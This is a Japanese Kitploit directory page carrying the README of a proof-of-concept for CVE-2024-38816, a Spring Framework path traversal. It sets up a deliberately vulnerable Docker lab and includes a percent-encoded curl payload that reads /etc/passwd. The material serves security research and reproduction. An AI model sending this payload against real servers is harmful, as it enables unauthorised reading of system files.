Skip to content
KitploitKITPLOIT
ツールブログ
提出
ツールブログ
提出

ハッキング、侵入テスト、サイバーセキュリティツールをあなたのセキュリティアーセナルに!

Kitploitはハッキング、サイバーセキュリティ、ペネトレーションテストのツールディレクトリです。最新のプロジェクトアップデートを見つけて、脆弱性の発見、システム分析、テストの自動化、セキュリティの強化を行いましょう。

··フィード·お問い合わせ·プライバシー·© 2026 Kitploit

ツールディレクトリ

カテゴリ

すべてのカテゴリを見る
Loading categories
CVE-2024-38816-PoC — CVE-2024-38816 の概念実証 | Kitploit
ツール/GitHubGitHub/wulinpin/cve-2024-38816-poc
脆弱性分析エクスプロイトウェブアプリケーション悪用ペネトレーションテスト学習と教育
GitHubwulinpin/cve-2024-38816-poc

CVE-2024-38816-PoC

CVE-2024-38816 の概念実証

リポジトリを見る
971年前未レビュー

人気

すべて見る →

コミュニティで最も使われているツールを見つけましょう。

すべてのツールを探索

ツールコレクションを閲覧

すべてのツールを見る →
共有

CVE-2024-38816 概念実証 (PoC)

これは CVE-2024-38816 脆弱性の概念実証であり、パストラバーサルエクスプロイトを実演します。

実行手順

  1. Docker イメージをビルドします: (Spring Boot 3.0.13、Spring Framework 6.0.3 ベース)

    root@kitploit:~
    docker build -t cve-2024-38816-poc .
    
  2. コンテナを実行し、ポート 8080 をホストマシンに公開します:

    root@kitploit:~
    docker run -d -p 8080:8080 --name cve-2024-38816-poc cve-2024-38816-poc
    
  3. 次のコマンドを実行して PoC を実行し、脆弱性を確認します:

    root@kitploit:~
    curl http://localhost:8080/static/link/%2e%2e/etc/passwd
    

    /etc/passwd ファイルの内容が表示された場合、脆弱性が確認されます。

注記

この PoC は、リリースノートとコミットログの分析に基づいて作成されました。実際の脆弱性の動作は異なる場合があるため、正確性は保証されません。自己責任で使用してください。

考慮事項

  1. この脆弱性は Spring Framework 6.1.13 で修正されており、リリースノート で確認できます。

  2. リリースノートと関連するコミットログを確認したところ、次の 2 つの issue がこの脆弱性に関連している可能性があると判断しました:

    • Issue #33424: シンボリックリンクに関連する新しいオプションが追加されました。
      • 関連コミット: 5d80d75051f395c17f6b9367e267d458585b336d
    • Issue #33434: パーセントエンコードされた文字をサニタイズするコードが修正されました。
      • 関連コミット: d86bf8b2056429edf5494456cffcb2b243331c49
  3. セキュリティアドバイザリ によると、攻撃を成功させるには次の条件が満たされている必要がある可能性が高いです:

    • RouterFunctions が使用されている
    • FileSystemResource が使用されている
    • シンボリックリンクが存在する
    • パーセントエンコードされた文字が攻撃に含まれている

環境セットアップ

脆弱性を再現するために Docker 環境を使用します。

  1. RouterFunction と FileSystemResource を使用して静的ファイルルーティングを設定するため、次のコードを含む PathTraversalDemoApplication.java を作成します:

    root@kitploit:~
    public RouterFunction<ServerResponse> staticResourceRouter() {
        return RouterFunctions.resources("/static/**", new FileSystemResource("/app/static/"));
    }
    
  2. シンボリックリンクを作成するために、次のコマンドを Dockerfile に追加します:

    root@kitploit:~
    RUN ln -s /static /app/static/link
    
  3. シンボリックリンクを介してディレクトリを横断するために、パーセントエンコーディングを利用したペイロードを作成します。

    • パス: /static/link/%2e%2e/etc/passwd
  4. 次の curl コマンドを使用して PoC を実行し、攻撃が成功するか確認します:

    root@kitploit:~
    curl http://localhost:8080/static/link/%2e%2e/etc/passwd
    

    攻撃が成功した場合、/etc/passwd ファイルの内容が表示されます。

免責事項

この PoC は教育およびセキュリティ研究の目的で提供されています。実際のシステムで使用する前に、脆弱性が修正され、適切な許可が得られていることを確認してください。作者は本コードの誤用について一切の責任を負いません。

ツールをダウンロード